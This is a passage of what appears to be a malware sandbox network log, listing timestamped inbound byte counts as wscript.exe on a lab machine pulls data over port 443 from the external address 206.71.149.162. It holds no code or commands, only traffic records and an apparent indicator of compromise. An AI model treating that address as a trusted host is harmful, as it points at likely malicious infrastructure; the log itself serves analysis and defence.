| 2023-10-24 04:55:22 UTC | 832 | IN | |
| 2023-10-24 04:55:22 UTC | 840 | IN | |
| 2023-10-24 04:55:22 UTC | 848 | IN | |
| 2023-10-24 04:55:22 UTC | 856 | IN | |
| 2023-10-24 04:55:22 UTC | 863 | IN | |
| 2023-10-24 04:55:22 UTC | 871 | IN | |
| 2023-10-24 04:55:22 UTC | 879 | IN | |
| 2023-10-24 04:55:22 UTC | 887 | IN | |
| 2023-10-24 04:55:22 UTC | 895 | IN | |
| 2023-10-24 04:55:22 UTC | 902 | IN | |
| 2023-10-24 04:55:22 UTC | 910 | IN | |
| 2023-10-24 04:55:22 UTC | 918 | IN | |
| 2023-10-24 04:55:22 UTC | 926 | IN | |
| 2023-10-24 04:55:22 UTC | 934 | IN | |
| 2023-10-24 04:55:22 UTC | 942 | IN | |
| 2023-10-24 04:55:22 UTC | 949 | IN | |
| 2023-10-24 04:55:22 UTC | 957 | IN | |
| 2023-10-24 04:55:22 UTC | 965 | IN | |
| 2023-10-24 04:55:22 UTC | 973 | IN | |
| 2023-10-24 04:55:22 UTC | 981 | IN | |
| 2023-10-24 04:55:22 UTC | 988 | IN | |
| 2023-10-24 04:55:22 UTC | 996 | IN | |
| 2023-10-24 04:55:22 UTC | 1004 | IN | |
| 2023-10-24 04:55:22 UTC | 1012 | IN | |
| 2023-10-24 04:55:22 UTC | 1020 | IN | |
| 2023-10-24 04:55:22 UTC | 1027 | IN | |
| 2023-10-24 04:55:22 UTC | 1035 | IN | |
| 2023-10-24 04:55:22 UTC | 1043 | IN | |
| 2023-10-24 04:55:22 UTC | 1051 | IN | |
| 2023-10-24 04:55:22 UTC | 1059 | IN | |
| 2023-10-24 04:55:22 UTC | 1067 | IN | |
| 2023-10-24 04:55:22 UTC | 1074 | IN | |
| 2023-10-24 04:55:22 UTC | 1082 | IN | |
| 2023-10-24 04:55:22 UTC | 1090 | IN | |
| 2023-10-24 04:55:22 UTC | 1098 | IN | |
| 2023-10-24 04:55:22 UTC | 1106 | IN | |
| 2023-10-24 04:55:22 UTC | 1113 | IN | |
| 2023-10-24 04:55:22 UTC | 1121 | IN | |
| 2023-10-24 04:55:22 UTC | 1129 | IN | |
| 2023-10-24 04:55:22 UTC | 1137 | IN | |
| 2023-10-24 04:55:22 UTC | 1145 | IN | |
| 2023-10-24 04:55:22 UTC | 1152 | IN | |
| 2023-10-24 04:55:22 UTC | 1160 | IN | |
| 2023-10-24 04:55:22 UTC | 1168 | IN | |
| 2023-10-24 04:55:22 UTC | 1176 | IN | |
| 2023-10-24 04:55:22 UTC | 1184 | IN | |
| 2023-10-24 04:55:22 UTC | 1192 | IN | |
| 2023-10-24 04:55:22 UTC | 1199 | IN | |
| 2023-10-24 04:55:22 UTC | 1207 | IN | |
| 2023-10-24 04:55:22 UTC | 1215 | IN | |
| 2023-10-24 04:55:22 UTC | 1223 | IN | |
| 2023-10-24 04:55:22 UTC | 1231 | IN | |
| 2023-10-24 04:55:22 UTC | 1238 | IN | |
| 2023-10-24 04:55:22 UTC | 1246 | IN | |
| 2023-10-24 04:55:22 UTC | 1254 | IN | |
| 2023-10-24 04:55:22 UTC | 1262 | IN | |
| 2023-10-24 04:55:22 UTC | 1270 | IN | |
| 2023-10-24 04:55:22 UTC | 1277 | IN | |
| 2023-10-24 04:55:22 UTC | 1285 | IN | |
| 2023-10-24 04:55:22 UTC | 1293 | IN | |
| 2023-10-24 04:55:22 UTC | 1301 | IN | |
| 2023-10-24 04:55:22 UTC | 1309 | IN | |
| 2023-10-24 04:55:22 UTC | 1317 | IN | |
| 2023-10-24 04:55:22 UTC | 1324 | IN | |
| 2023-10-24 04:55:22 UTC | 1332 | IN | |
| 2023-10-24 04:55:22 UTC | 1340 | IN | |
| 2023-10-24 04:55:22 UTC | 1348 | IN | |
| 2023-10-24 04:55:22 UTC | 1356 | IN | |
| 2023-10-24 04:55:22 UTC | 1363 | IN | |
| 2023-10-24 04:55:22 UTC | 1371 | IN | |
| 2023-10-24 04:55:22 UTC | 1379 | IN | |
| 2023-10-24 04:55:22 UTC | 1387 | IN | |
| 2023-10-24 04:55:22 UTC | 1395 | IN | |
| 2023-10-24 04:55:22 UTC | 1402 | IN | |
| 2023-10-24 04:55:22 UTC | 1410 | IN | |
| 2023-10-24 04:55:22 UTC | 1418 | IN | |
| 2023-10-24 04:55:22 UTC | 1426 | IN | |
| 2023-10-24 04:55:22 UTC | 1434 | IN | |
| 2023-10-24 04:55:22 UTC | 1442 | IN | |
| 2023-10-24 04:55:22 UTC | 1449 | IN | |
| 2023-10-24 04:55:22 UTC | 1457 | IN | |
| 2023-10-24 04:55:22 UTC | 1465 | IN | |
| 2023-10-24 04:55:22 UTC | 1473 | IN | |
| 2023-10-24 04:55:22 UTC | 1481 | IN | |
| 2023-10-24 04:55:22 UTC | 1488 | IN | |
| 2023-10-24 04:55:22 UTC | 1496 | IN | |
| 2023-10-24 04:55:22 UTC | 1504 | IN | |
| 2023-10-24 04:55:22 UTC | 1512 | IN | |
| 2023-10-24 04:55:22 UTC | 1520 | IN | |
| 2023-10-24 04:55:22 UTC | 1527 | IN | |
| 2023-10-24 04:55:22 UTC | 1535 | IN | |
| 2023-10-24 04:55:22 UTC | 1543 | IN | |
| 2023-10-24 04:55:22 UTC | 1551 | IN | |
| 2023-10-24 04:55:22 UTC | 1559 | IN | |
| 2023-10-24 04:55:22 UTC | 1567 | IN | |
| 2023-10-24 04:55:22 UTC | 1574 | IN | |
| 2023-10-24 04:55:22 UTC | 1582 | IN | |
| 2023-10-24 04:55:22 UTC | 1590 | IN | |
| 2023-10-24 04:55:22 UTC | 1598 | IN | |
| 2023-10-24 04:55:22 UTC | 1606 | IN | |
| 2023-10-24 04:55:22 UTC | 1613 | IN | |
| 2023-10-24 04:55:22 UTC | 1621 | IN | |
| 2023-10-24 04:55:22 UTC | 1629 | IN | |
| 2023-10-24 04:55:22 UTC | 1637 | IN | |
| 2023-10-24 04:55:22 UTC | 1645 | IN | |
| 2023-10-24 04:55:22 UTC | 1652 | IN | |
| 2023-10-24 04:55:22 UTC | 1660 | IN | |
| 2023-10-24 04:55:22 UTC | 1668 | IN | |
| 2023-10-24 04:55:22 UTC | 1676 | IN | |
| 2023-10-24 04:55:22 UTC | 1684 | IN | |
| 2023-10-24 04:55:22 UTC | 1692 | IN | |
| 2023-10-24 04:55:22 UTC | 1699 | IN | |
| 2023-10-24 04:55:22 UTC | 1707 | IN | |
| 2023-10-24 04:55:22 UTC | 1715 | IN | |
| 2023-10-24 04:55:22 UTC | 1723 | IN | |
| 2023-10-24 04:55:22 UTC | 1731 | IN | |
| 2023-10-24 04:55:22 UTC | 1738 | IN | |
| 2023-10-24 04:55:22 UTC | 1746 | IN | |
| 2023-10-24 04:55:22 UTC | 1754 | IN | |
| 2023-10-24 04:55:22 UTC | 1762 | IN | |
| 2023-10-24 04:55:22 UTC | 1770 | IN | |
| 2023-10-24 04:55:22 UTC | 1777 | IN | |
| 2023-10-24 04:55:22 UTC | 1785 | IN | |
| 2023-10-24 04:55:22 UTC | 1793 | IN | |
| 2023-10-24 04:55:22 UTC | 1801 | IN | |
| 2023-10-24 04:55:22 UTC | 1809 | IN | |
| 2023-10-24 04:55:22 UTC | 1817 | IN | |
| 2023-10-24 04:55:22 UTC | 1824 | IN | |
| 2023-10-24 04:55:22 UTC | 1832 | IN | |
| 2023-10-24 04:55:22 UTC | 1840 | IN | |
| 2023-10-24 04:55:22 UTC | 1848 | IN | |
| 2023-10-24 04:55:22 UTC | 1856 | IN | |
| 2023-10-24 04:55:22 UTC | 1863 | IN | |
| 2023-10-24 04:55:22 UTC | 1871 | IN | |
| 2023-10-24 04:55:22 UTC | 1879 | IN | |
| 2023-10-24 04:55:22 UTC | 1887 | IN | |
| 2023-10-24 04:55:22 UTC | 1895 | IN | |
| 2023-10-24 04:55:22 UTC | 1902 | IN | |
| 2023-10-24 04:55:22 UTC | 1910 | IN | |
| 2023-10-24 04:55:22 UTC | 1918 | IN | |
| 2023-10-24 04:55:22 UTC | 1926 | IN | |
| 2023-10-24 04:55:22 UTC | 1934 | IN | |
| 2023-10-24 04:55:22 UTC | 1942 | IN | |
| 2023-10-24 04:55:22 UTC | 1949 | IN | |
| 2023-10-24 04:55:22 UTC | 1957 | IN | |
| 2023-10-24 04:55:22 UTC | 1965 | IN | |
| 2023-10-24 04:55:22 UTC | 1973 | IN | |
| 2023-10-24 04:55:22 UTC | 1981 | IN | |
| 2023-10-24 04:55:22 UTC | 1988 | IN | |
| 2023-10-24 04:55:22 UTC | 1996 | IN | |
| 2023-10-24 04:55:22 UTC | 2004 | IN | |
| 2023-10-24 04:55:22 UTC | 2012 | IN | |
| 2023-10-24 04:55:22 UTC | 2020 | IN | |
| 2023-10-24 04:55:22 UTC | 2027 | IN | |
| 2023-10-24 04:55:22 UTC | 2035 | IN | |
| 2023-10-24 04:55:22 UTC | 2043 | IN | |
| 2023-10-24 04:55:22 UTC | 2051 | IN | |
| 2023-10-24 04:55:22 UTC | 2059 | IN | |
| 2023-10-24 04:55:22 UTC | 2067 | IN | |
| 2023-10-24 04:55:22 UTC | 2074 | IN | |
| 2023-10-24 04:55:22 UTC | 2082 | IN | |
| 2023-10-24 04:55:22 UTC | 2090 | IN | |
| 2023-10-24 04:55:22 UTC | 2098 | IN | |
| 2023-10-24 04:55:22 UTC | 2106 | IN | |
| 2023-10-24 04:55:22 UTC | 2113 | IN | |
| 2023-10-24 04:55:22 UTC | 2121 | IN | |
| 2023-10-24 04:55:22 UTC | 2129 | IN | |
| 2023-10-24 04:55:22 UTC | 2137 | IN | |
| 2023-10-24 04:55:22 UTC | 2145 | IN | |
| 2023-10-24 04:55:22 UTC | 2152 | IN | |
| 2023-10-24 04:55:22 UTC | 2160 | IN | |
| 2023-10-24 04:55:22 UTC | 2168 | IN | |
| 2023-10-24 04:55:22 UTC | 2176 | IN | |
| 2023-10-24 04:55:22 UTC | 2184 | IN | |
| 2023-10-24 04:55:22 UTC | 2192 | IN | |
| 2023-10-24 04:55:22 UTC | 2199 | IN | |
| 2023-10-24 04:55:22 UTC | 2207 | IN | |
| 2023-10-24 04:55:22 UTC | 2215 | IN | |
| 2023-10-24 04:55:22 UTC | 2223 | IN | |
| 2023-10-24 04:55:22 UTC | 2231 | IN | |
| 2023-10-24 04:55:22 UTC | 2238 | IN | |
| 2023-10-24 04:55:22 UTC | 2246 | IN | |
| 2023-10-24 04:55:22 UTC | 2254 | IN | |
| 2023-10-24 04:55:22 UTC | 2262 | IN | |
| 2023-10-24 04:55:22 UTC | 2270 | IN | |
| 2023-10-24 04:55:22 UTC | 2277 | IN | |
| 2023-10-24 04:55:22 UTC | 2285 | IN | |
| 2023-10-24 04:55:22 UTC | 2293 | IN | |
| 2023-10-24 04:55:22 UTC | 2301 | IN | |
| 2023-10-24 04:55:22 UTC | 2309 | IN | |
| 2023-10-24 04:55:22 UTC | 2317 | IN | |
| 2023-10-24 04:55:22 UTC | 2324 | IN | |
| 2023-10-24 04:55:22 UTC | 2332 | IN | |
| 2023-10-24 04:55:22 UTC | 2340 | IN | |
| 2023-10-24 04:55:22 UTC | 2348 | IN | |
| 2023-10-24 04:55:22 UTC | 2356 | IN | |
| 2023-10-24 04:55:22 UTC | 2363 | IN | |
| 2023-10-24 04:55:22 UTC | 2371 | IN | |
| 2023-10-24 04:55:22 UTC | 2379 | IN | |
| 2023-10-24 04:55:22 UTC | 2387 | IN | |
| 2023-10-24 04:55:22 UTC | 2395 | IN | |
| 2023-10-24 04:55:22 UTC | 2402 | IN | |
| 2023-10-24 04:55:22 UTC | 2410 | IN | |
| 2023-10-24 04:55:22 UTC | 2418 | IN | |
| 2023-10-24 04:55:22 UTC | 2426 | IN | |
| 2023-10-24 04:55:22 UTC | 2434 | IN | |
| 2023-10-24 04:55:22 UTC | 2442 | IN | |
| 2023-10-24 04:55:22 UTC | 2449 | IN | |
| 2023-10-24 04:55:22 UTC | 2457 | IN | |
| 2023-10-24 04:55:22 UTC | 2465 | IN | |
| 2023-10-24 04:55:22 UTC | 2473 | IN | |
| 2023-10-24 04:55:22 UTC | 2481 | IN | |
| 2023-10-24 04:55:22 UTC | 2488 | IN | |
| 2023-10-24 04:55:22 UTC | 2496 | IN | |
| 2023-10-24 04:55:22 UTC | 2504 | IN | |
| 2023-10-24 04:55:22 UTC | 2512 | IN | |
| 2023-10-24 04:55:22 UTC | 2520 | IN | |
| 2023-10-24 04:55:22 UTC | 2527 | IN | |
| 2023-10-24 04:55:22 UTC | 2535 | IN | |
| 2023-10-24 04:55:22 UTC | 2543 | IN | |
| 2023-10-24 04:55:22 UTC | 2551 | IN | |
| 2023-10-24 04:55:22 UTC | 2559 | IN | |
| 2023-10-24 04:55:22 UTC | 2567 | IN | |
| 2023-10-24 04:55:22 UTC | 2574 | IN | |
| 2023-10-24 04:55:22 UTC | 2582 | IN | |
| 2023-10-24 04:55:22 UTC | 2590 | IN | |
| 2023-10-24 04:55:22 UTC | 2598 | IN | |
| 2023-10-24 04:55:22 UTC | 2606 | IN | |
| 2023-10-24 04:55:22 UTC | 2613 | IN | |
| 2023-10-24 04:55:22 UTC | 2621 | IN | |
| 2023-10-24 04:55:22 UTC | 2629 | IN | |
| 2023-10-24 04:55:22 UTC | 2637 | IN | |
| 2023-10-24 04:55:22 UTC | 2645 | IN | |
| 2023-10-24 04:55:22 UTC | 2652 | IN | |
| 2023-10-24 04:55:22 UTC | 2660 | IN | |
| 2023-10-24 04:55:22 UTC | 2668 | IN | |
| 2023-10-24 04:55:22 UTC | 2676 | IN | |
| 2023-10-24 04:55:22 UTC | 2684 | IN | |
| 2023-10-24 04:55:22 UTC | 2692 | IN | |
| 2023-10-24 04:55:22 UTC | 2699 | IN | |
| 2023-10-24 04:55:22 UTC | 2707 | IN | |
| 2023-10-24 04:55:22 UTC | 2715 | IN | |
| 2023-10-24 04:55:22 UTC | 2723 | IN | |
| 2023-10-24 04:55:22 UTC | 2731 | IN | |
| 2023-10-24 04:55:22 UTC | 2738 | IN | |
| 2023-10-24 04:55:22 UTC | 2746 | IN | |
| 2023-10-24 04:55:22 UTC | 2754 | IN | |
| 2023-10-24 04:55:22 UTC | 2762 | IN | |
| 2023-10-24 04:55:22 UTC | 2770 | IN | |
| 2023-10-24 04:55:22 UTC | 2777 | IN | |
| 2023-10-24 04:55:22 UTC | 2785 | IN | |
| 2023-10-24 04:55:22 UTC | 2793 | IN | |
| 2023-10-24 04:55:22 UTC | 2801 | IN | |
| 2023-10-24 04:55:22 UTC | 2809 | IN | |
| 2023-10-24 04:55:22 UTC | 2817 | IN | |
| 2023-10-24 04:55:22 UTC | 2824 | IN | |
| 2023-10-24 04:55:22 UTC | 2832 | IN | |
| 2023-10-24 04:55:22 UTC | 2840 | IN | |
| 2023-10-24 04:55:22 UTC | 2848 | IN | |
| 2023-10-24 04:55:22 UTC | 2856 | IN | |
| 2023-10-24 04:55:22 UTC | 2863 | IN | |
| 2023-10-24 04:55:22 UTC | 2871 | IN | |
| 2023-10-24 04:55:22 UTC | 2879 | IN | |
| 2023-10-24 04:55:22 UTC | 2887 | IN | |
| 2023-10-24 04:55:22 UTC | 2895 | IN | |
| 2023-10-24 04:55:22 UTC | 2902 | IN | |
| 2023-10-24 04:55:22 UTC | 2910 | IN | |
| 2023-10-24 04:55:22 UTC | 2918 | IN | |
| 2023-10-24 04:55:22 UTC | 2926 | IN | |
| 2023-10-24 04:55:22 UTC | 2934 | IN | |
| 2023-10-24 04:55:22 UTC | 2942 | IN | |
| 2023-10-24 04:55:22 UTC | 2949 | IN | |
| 2023-10-24 04:55:22 UTC | 2957 | IN | |
| 2023-10-24 04:55:22 UTC | 2965 | IN | |
| 2023-10-24 04:55:22 UTC | 2973 | IN | |
| 2023-10-24 04:55:22 UTC | 2981 | IN | |
| 2023-10-24 04:55:22 UTC | 2988 | IN | |
| 2023-10-24 04:55:22 UTC | 2996 | IN | |
| 2023-10-24 04:55:22 UTC | 3004 | IN | |
| 2023-10-24 04:55:22 UTC | 3012 | IN | |
| 2023-10-24 04:55:22 UTC | 3020 | IN | |
| 2023-10-24 04:55:22 UTC | 3027 | IN | |
| 2023-10-24 04:55:22 UTC | 3035 | IN | |
| 2023-10-24 04:55:22 UTC | 3043 | IN | |
| 2023-10-24 04:55:22 UTC | 3051 | IN | |
| 2023-10-24 04:55:22 UTC | 3059 | IN | |
| 2023-10-24 04:55:22 UTC | 3067 | IN | |
| 2023-10-24 04:55:22 UTC | 3074 | IN | |
| 2023-10-24 04:55:22 UTC | 3082 | IN | |
| 2023-10-24 04:55:22 UTC | 3090 | IN | |
| 2023-10-24 04:55:22 UTC | 3098 | IN | |
| 2023-10-24 04:55:22 UTC | 3106 | IN | |
| 2023-10-24 04:55:22 UTC | 3113 | IN | |
| 2023-10-24 04:55:22 UTC | 3121 | IN | |
| 2023-10-24 04:55:22 UTC | 3129 | IN | |
| 2023-10-24 04:55:22 UTC | 3137 | IN | |
| 2023-10-24 04:55:22 UTC | 3145 | IN | |
| 2023-10-24 04:55:22 UTC | 3152 | IN | |
| 2023-10-24 04:55:22 UTC | 3160 | IN | |
| 2023-10-24 04:55:22 UTC | 3168 | IN | |
| 2023-10-24 04:55:22 UTC | 3176 | IN | |
| 2023-10-24 04:55:22 UTC | 3184 | IN | |
| 2023-10-24 04:55:22 UTC | 3192 | IN | |
| 2023-10-24 04:55:22 UTC | 3199 | IN | |
| 2023-10-24 04:55:22 UTC | 3207 | IN | |
| 2023-10-24 04:55:22 UTC | 3215 | IN | |
| 2023-10-24 04:55:22 UTC | 3223 | IN | |
| 2023-10-24 04:55:22 UTC | 3231 | IN | |
| 2023-10-24 04:55:22 UTC | 3238 | IN | |
| 2023-10-24 04:55:22 UTC | 3246 | IN | |
| 2023-10-24 04:55:22 UTC | 3254 | IN | |
| 2023-10-24 04:55:22 UTC | 3262 | IN | |
| 2023-10-24 04:55:22 UTC | 3270 | IN | |
| 2023-10-24 04:55:22 UTC | 3277 | IN | |
| 2023-10-24 04:55:22 UTC | 3285 | IN | |
| 2023-10-24 04:55:22 UTC | 3293 | IN | |
| 2023-10-24 04:55:22 UTC | 3301 | IN | |
| 2023-10-24 04:55:22 UTC | 3309 | IN | |
| 2023-10-24 04:55:22 UTC | 3317 | IN | |
| 2023-10-24 04:55:22 UTC | 3324 | IN | |
| 2023-10-24 04:55:22 UTC | 3332 | IN | |
| 2023-10-24 04:55:22 UTC | 3340 | IN | |
| 2023-10-24 04:55:22 UTC | 3348 | IN | |
| 2023-10-24 04:55:22 UTC | 3356 | IN | |
| 2023-10-24 04:55:22 UTC | 3363 | IN | |
| 2023-10-24 04:55:22 UTC | 3371 | IN | |
| 2023-10-24 04:55:22 UTC | 3379 | IN | |
| 2023-10-24 04:55:22 UTC | 3387 | IN | |
| 2023-10-24 04:55:22 UTC | 3395 | IN | |
| 2023-10-24 04:55:22 UTC | 3402 | IN | |
| 2023-10-24 04:55:22 UTC | 3410 | IN | |
| 2023-10-24 04:55:22 UTC | 3418 | IN | |
| 2023-10-24 04:55:22 UTC | 3426 | IN | |
| 2023-10-24 04:55:22 UTC | 3434 | IN | |
| 2023-10-24 04:55:22 UTC | 3442 | IN | |
| 2023-10-24 04:55:22 UTC | 3449 | IN | |
| 2023-10-24 04:55:22 UTC | 3457 | IN | |
| 2023-10-24 04:55:22 UTC | 3465 | IN | |
| 2023-10-24 04:55:22 UTC | 3473 | IN | |
| 2023-10-24 04:55:22 UTC | 3481 | IN | |
| 2023-10-24 04:55:22 UTC | 3488 | IN | |
| 2023-10-24 04:55:22 UTC | 3496 | IN | |
| 2023-10-24 04:55:22 UTC | 3504 | IN | |
| 2023-10-24 04:55:22 UTC | 3512 | IN | |
| 2023-10-24 04:55:22 UTC | 3520 | IN | |
| 2023-10-24 04:55:22 UTC | 3527 | IN | |
| 2023-10-24 04:55:22 UTC | 3535 | IN | |
| 2023-10-24 04:55:22 UTC | 3543 | IN | |
| 2023-10-24 04:55:22 UTC | 3551 | IN | |
| 2023-10-24 04:55:22 UTC | 3559 | IN | |
| 2023-10-24 04:55:22 UTC | 3567 | IN | |
| 2023-10-24 04:55:22 UTC | 3574 | IN | |
| 2023-10-24 04:55:22 UTC | 3582 | IN | |
| 2023-10-24 04:55:22 UTC | 3590 | IN | |
| 2023-10-24 04:55:22 UTC | 3598 | IN | |
| 2023-10-24 04:55:22 UTC | 3606 | IN | |
| 2023-10-24 04:55:22 UTC | 3613 | IN | |
| 2023-10-24 04:55:22 UTC | 3621 | IN | |
| 2023-10-24 04:55:22 UTC | 3629 | IN | |
| 2023-10-24 04:55:22 UTC | 3637 | IN | |
| 2023-10-24 04:55:22 UTC | 3645 | IN | |
| 2023-10-24 04:55:22 UTC | 3652 | IN | |
| 2023-10-24 04:55:22 UTC | 3660 | IN | |
| 2023-10-24 04:55:22 UTC | 3668 | IN | |
| 2023-10-24 04:55:22 UTC | 3676 | IN | |
| 2023-10-24 04:55:22 UTC | 3684 | IN | |
| 2023-10-24 04:55:22 UTC | 3692 | IN | |
| 2023-10-24 04:55:22 UTC | 3699 | IN | |
| 2023-10-24 04:55:22 UTC | 3707 | IN | |
| 2023-10-24 04:55:22 UTC | 3715 | IN | |
| 2023-10-24 04:55:22 UTC | 3723 | IN | |
| 2023-10-24 04:55:22 UTC | 3731 | IN | |
| 2023-10-24 04:55:22 UTC | 3738 | IN | |
| 2023-10-24 04:55:22 UTC | 3746 | IN | |
| 2023-10-24 04:55:22 UTC | 3754 | IN | |
| 2023-10-24 04:55:22 UTC | 3762 | IN | |
| 2023-10-24 04:55:22 UTC | 3770 | IN | |
| 2023-10-24 04:55:22 UTC | 3777 | IN | |
| 2023-10-24 04:55:22 UTC | 3785 | IN | |
| 2023-10-24 04:55:22 UTC | 3793 | IN | |
| 2023-10-24 04:55:22 UTC | 3801 | IN | |
| 2023-10-24 04:55:22 UTC | 3809 | IN | |
| 2023-10-24 04:55:22 UTC | 3817 | IN | |
| 2023-10-24 04:55:22 UTC | 3824 | IN | |
| 2023-10-24 04:55:22 UTC | 3832 | IN | |
| 2023-10-24 04:55:22 UTC | 3840 | IN | |
| 2023-10-24 04:55:22 UTC | 3848 | IN | |
| 2023-10-24 04:55:22 UTC | 3856 | IN | |
| 2023-10-24 04:55:22 UTC | 3863 | IN | |
| 2023-10-24 04:55:22 UTC | 3871 | IN | |
| 2023-10-24 04:55:22 UTC | 3879 | IN | |
| 2023-10-24 04:55:22 UTC | 3887 | IN | |
| 2023-10-24 04:55:22 UTC | 3895 | IN | |
| 2023-10-24 04:55:22 UTC | 3902 | IN | |
| 2023-10-24 04:55:22 UTC | 3910 | IN | |
| 2023-10-24 04:55:22 UTC | 3918 | IN | |
| 2023-10-24 04:55:22 UTC | 3926 | IN | |
| 2023-10-24 04:55:22 UTC | 3934 | IN | |
| 2023-10-24 04:55:22 UTC | 3942 | IN | |
| 2023-10-24 04:55:22 UTC | 3949 | IN | |
| 2023-10-24 04:55:22 UTC | 3957 | IN | |
| 2023-10-24 04:55:22 UTC | 3965 | IN | |
| 2023-10-24 04:55:22 UTC | 3973 | IN | |
| 2023-10-24 04:55:22 UTC | 3981 | IN | |
| 2023-10-24 04:55:22 UTC | 3988 | IN | |
| 2023-10-24 04:55:22 UTC | 3996 | IN | |
| 2023-10-24 04:55:22 UTC | 4004 | IN | |
| 2023-10-24 04:55:22 UTC | 4012 | IN | |
| 2023-10-24 04:55:22 UTC | 4020 | IN | |
| 2023-10-24 04:55:22 UTC | 4027 | IN | |
| 2023-10-24 04:55:22 UTC | 4035 | IN | |
| 2023-10-24 04:55:22 UTC | 4043 | IN | |
| 2023-10-24 04:55:22 UTC | 4051 | IN | |
| 2023-10-24 04:55:22 UTC | 4059 | IN | |
| 2023-10-24 04:55:22 UTC | 4067 | IN | |
| 2023-10-24 04:55:22 UTC | 4074 | IN | |
| 2023-10-24 04:55:22 UTC | 4082 | IN | |
| 2023-10-24 04:55:22 UTC | 4090 | IN | |
| 2023-10-24 04:55:22 UTC | 4098 | IN | |
| 2023-10-24 04:55:22 UTC | 4106 | IN | |
| 2023-10-24 04:55:22 UTC | 4113 | IN | |
| 2023-10-24 04:55:22 UTC | 4121 | IN | |
| 2023-10-24 04:55:22 UTC | 4129 | IN | |
| 2023-10-24 04:55:22 UTC | 4137 | IN | |
| 2023-10-24 04:55:22 UTC | 4145 | IN | |
| 2023-10-24 04:55:22 UTC | 4152 | IN | |
| 2023-10-24 04:55:22 UTC | 4160 | IN | |
| 2023-10-24 04:55:22 UTC | 4168 | IN | |
| 2023-10-24 04:55:22 UTC | 4176 | IN | |
| 2023-10-24 04:55:22 UTC | 4184 | IN | |
| 2023-10-24 04:55:22 UTC | 4192 | IN | |
| 2023-10-24 04:55:22 UTC | 4199 | IN | |
| 2023-10-24 04:55:22 UTC | 4207 | IN | |
| 2023-10-24 04:55:22 UTC | 4215 | IN | |
| 2023-10-24 04:55:22 UTC | 4223 | IN | |
| 2023-10-24 04:55:22 UTC | 4231 | IN | |
| 2023-10-24 04:55:22 UTC | 4238 | IN | |
| 2023-10-24 04:55:22 UTC | 4246 | IN | |
| 2023-10-24 04:55:22 UTC | 4254 | IN | |
| 2023-10-24 04:55:22 UTC | 4262 | IN | |
| 2023-10-24 04:55:22 UTC | 4270 | IN | |
| 2023-10-24 04:55:22 UTC | 4277 | IN | |
| 2023-10-24 04:55:22 UTC | 4285 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 4 | 192.168.2.4 | 49741 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:25 UTC | 4286 | OUT | |
| 2023-10-24 04:55:26 UTC | 4287 | IN | |
| 2023-10-24 04:55:26 UTC | 4287 | IN | |
| 2023-10-24 04:55:26 UTC | 4295 | IN | |
| 2023-10-24 04:55:26 UTC | 4303 | IN | |
| 2023-10-24 04:55:26 UTC | 4310 | IN | |
| 2023-10-24 04:55:27 UTC | 4318 | IN | |
| 2023-10-24 04:55:27 UTC | 4326 | IN | |
| 2023-10-24 04:55:27 UTC | 4334 | IN | |
| 2023-10-24 04:55:27 UTC | 4342 | IN | |
| 2023-10-24 04:55:27 UTC | 4349 | IN | |
| 2023-10-24 04:55:27 UTC | 4357 | IN | |
| 2023-10-24 04:55:27 UTC | 4365 | IN | |
| 2023-10-24 04:55:28 UTC | 4373 | IN | |
| 2023-10-24 04:55:28 UTC | 4381 | IN | |
| 2023-10-24 04:55:28 UTC | 4389 | IN | |
| 2023-10-24 04:55:28 UTC | 4396 | IN | |
| 2023-10-24 04:55:28 UTC | 4404 | IN | |
| 2023-10-24 04:55:28 UTC | 4412 | IN | |
| 2023-10-24 04:55:28 UTC | 4420 | IN | |
| 2023-10-24 04:55:28 UTC | 4428 | IN | |
| 2023-10-24 04:55:29 UTC | 4435 | IN | |
| 2023-10-24 04:55:29 UTC | 4443 | IN | |
| 2023-10-24 04:55:29 UTC | 4451 | IN | |
| 2023-10-24 04:55:29 UTC | 4459 | IN | |
| 2023-10-24 04:55:29 UTC | 4467 | IN | |
| 2023-10-24 04:55:29 UTC | 4474 | IN | |
| 2023-10-24 04:55:29 UTC | 4482 | IN | |
| 2023-10-24 04:55:30 UTC | 4490 | IN | |
| 2023-10-24 04:55:30 UTC | 4498 | IN | |
| 2023-10-24 04:55:30 UTC | 4506 | IN | |
| 2023-10-24 04:55:30 UTC | 4514 | IN | |
| 2023-10-24 04:55:30 UTC | 4521 | IN | |
| 2023-10-24 04:55:30 UTC | 4529 | IN | |
| 2023-10-24 04:55:31 UTC | 4537 | IN | |
| 2023-10-24 04:55:31 UTC | 4545 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 5 | 192.168.2.4 | 49743 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:35 UTC | 4549 | OUT | |
| 2023-10-24 04:55:35 UTC | 4549 | IN | |
| 2023-10-24 04:55:35 UTC | 4549 | IN | |
| 2023-10-24 04:55:36 UTC | 4557 | IN | |
| 2023-10-24 04:55:36 UTC | 4565 | IN | |
| 2023-10-24 04:55:36 UTC | 4573 | IN | |
| 2023-10-24 04:55:36 UTC | 4580 | IN | |
| 2023-10-24 04:55:36 UTC | 4588 | IN | |
| 2023-10-24 04:55:36 UTC | 4596 | IN | |
| 2023-10-24 04:55:36 UTC | 4604 | IN | |
| 2023-10-24 04:55:36 UTC | 4612 | IN | |
| 2023-10-24 04:55:36 UTC | 4619 | IN | |
| 2023-10-24 04:55:36 UTC | 4627 | IN | |
| 2023-10-24 04:55:36 UTC | 4635 | IN | |
| 2023-10-24 04:55:36 UTC | 4643 | IN | |
| 2023-10-24 04:55:36 UTC | 4651 | IN | |
| 2023-10-24 04:55:36 UTC | 4659 | IN | |
| 2023-10-24 04:55:36 UTC | 4666 | IN | |
| 2023-10-24 04:55:36 UTC | 4674 | IN | |
| 2023-10-24 04:55:36 UTC | 4682 | IN | |
| 2023-10-24 04:55:36 UTC | 4690 | IN | |
| 2023-10-24 04:55:36 UTC | 4698 | IN | |
| 2023-10-24 04:55:36 UTC | 4705 | IN | |
| 2023-10-24 04:55:36 UTC | 4713 | IN | |
| 2023-10-24 04:55:36 UTC | 4721 | IN | |
| 2023-10-24 04:55:36 UTC | 4729 | IN | |
| 2023-10-24 04:55:36 UTC | 4737 | IN | |
| 2023-10-24 04:55:36 UTC | 4744 | IN | |
| 2023-10-24 04:55:36 UTC | 4752 | IN | |
